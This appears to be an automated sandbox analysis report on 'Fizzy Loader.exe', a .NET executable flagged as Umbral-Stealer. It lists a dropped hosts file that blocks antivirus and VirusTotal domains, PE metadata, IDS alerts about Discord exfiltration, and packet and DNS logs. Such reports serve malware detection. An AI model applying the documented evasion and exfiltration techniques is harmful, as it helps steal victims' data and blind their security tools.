                                                                                                                                                          C:\Users\user\AppData\Local\Temp\xXqgp7GhpytTlpV

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):0.8439810553697228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2223
                                                                                                                                                          Entropy (8bit):4.573013811987098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                                                                                          MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                                                                                          SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                                                                                          SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                                                                                          SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Entropy (8bit):6.0522746277225234
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          File name:Fizzy Loader.exe
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5:b56af795f8b7edc6f35a9e905921ed0e
                                                                                                                                                          SHA1:c82cb0088bc9c93fd9a491ad278f410d44265a4d
                                                                                                                                                          SHA256:46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
                                                                                                                                                          SHA512:c35b429e243845337903fa5cc6853c6921514b2fcd84e7788607aa47414be9b2101c8b87acd1766666daa7fc0cdd2b7a5be19ac5754db8f12c3e262ea792f9c6
                                                                                                                                                          SSDEEP:6144:dloZM+rIkd8g+EtXHkv/iD4M7+QWRJ6RvSgR1E9/gF8e1mfIi:/oZtL+EP8M7+QWRJ6RvSgR1Ecqx
                                                                                                                                                          TLSH:A4346B5837B89F16E25F8BBEE5B1148F8771F103E90AF7CE0C8895EC2411B42E949A57
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.............~.... ........@.. ....................................`................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x43aa7e
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3aa280x53.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x550.rsrc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3aa0c0x1c.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                          Sections

                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          .text0x20000x38a840x38c00b9069dec35a882deca70ac70a52578d8False0.39876015280837data6.0681412862433985IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                          .rsrc0x3c0000x5500x600962661cf515c57234d66775c661dfadeFalse0.4134114583333333data4.575008625258809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                          .reloc0x3e0000xc0x2003ce13a370488f4dff6dc4763fbc4f166False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                          Resources

                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                          RT_VERSION0x3c0a00x2c4data0.4449152542372881
                                                                                                                                                          RT_MANIFEST0x3c3640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                          Imports

                                                                                                                                                          DLLImport
                                                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                                                          Network Behavior

                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-12-31T00:50:28.592541+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549807208.95.112.180TCP
                                                                                                                                                          2024-12-31T00:50:52.056252+01002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549939162.159.138.232443TCP

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 31, 2024 00:49:54.510446072 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:49:54.515292883 CET8049705208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:49:54.515362978 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:49:54.515573978 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:49:54.520476103 CET8049705208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:49:55.065258026 CET8049705208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:49:55.110405922 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:28.075512886 CET4980780192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:28.080307961 CET8049807208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:28.080534935 CET4980780192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:28.080804110 CET4980780192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:28.085701942 CET8049807208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:28.581872940 CET8049807208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:28.592540979 CET4980780192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:28.597492933 CET8049807208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:28.597558975 CET4980780192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:32.032587051 CET8049705208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:32.032665014 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:51.215277910 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.215297937 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.215359926 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.216022015 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.216036081 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.675847054 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.675971031 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.678277016 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.678288937 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.678550959 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.686805010 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.686956882 CET4970580192.168.2.5208.95.112.1
                                                                                                                                                          Dec 31, 2024 00:50:51.691791058 CET8049705208.95.112.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.731338024 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.805486917 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:51.809819937 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:51.809848070 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.056286097 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.056363106 CET44349939162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.056457043 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.060775042 CET49939443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.061868906 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.061908960 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.061975002 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.062189102 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.062201977 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.579425097 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.589627028 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.589653015 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.721144915 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.728657961 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.728671074 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.728754997 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.728759050 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.728930950 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.728940964 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.729007006 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.729018927 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.729027033 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.729032993 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.729074001 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.729079008 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.729134083 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.729146004 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.730885029 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.730891943 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.730972052 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.730978012 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731015921 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731021881 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731080055 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731086016 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731127977 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731134892 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731173992 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731179953 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731302023 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731307983 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731350899 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731358051 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731473923 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731479883 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731523037 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731528997 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731589079 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731594086 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731625080 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731633902 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731684923 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731690884 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731743097 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731749058 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731789112 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731794119 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731839895 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731846094 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731899023 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731904984 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731947899 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731952906 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732002974 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732008934 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732060909 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732079029 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732709885 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732716084 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732780933 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732786894 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733114958 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733119965 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733184099 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733190060 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733263016 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733268976 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733330965 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733508110 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733633995 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733736992 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733839989 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.739749908 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.741100073 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741106987 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.741189003 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741235018 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741283894 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741328001 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741364956 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.748291016 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749056101 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749063969 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749094963 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749128103 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749327898 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749363899 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.754353046 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418612957 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418694019 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418741941 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:53.419186115 CET49945443192.168.2.5162.159.138.232

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 31, 2024 00:49:54.502784967 CET5566353192.168.2.51.1.1.1
                                                                                                                                                          Dec 31, 2024 00:49:54.509510994 CET53556631.1.1.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:28.066936016 CET5136453192.168.2.51.1.1.1
                                                                                                                                                          Dec 31, 2024 00:50:28.074982882 CET53513641.1.1.1192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:50.418452024 CET5860353192.168.2.51.1.1.1
                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET53586031.1.1.1192.168.2.5

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Dec 31, 2024 00:49:54.502784967 CET192.168.2.51.1.1.10xc15Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:28.066936016 CET192.168.2.51.1.1.10x6c51Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:50.418452024 CET192.168.2.51.1.1.10x3d46Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Dec 31, 2024 00:49:54.509510994 CET1.1.1.1192.168.2.50xc15No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:28.074982882 CET1.1.1.1192.168.2.50x6c51No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET1.1.1.1192.168.2.50x3d46No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET1.1.1.1192.168.2.50x3d46No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                          Dec 31, 2024 00:50:51.214456081 CET1.1.1.1192.168.2.50x3d46No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
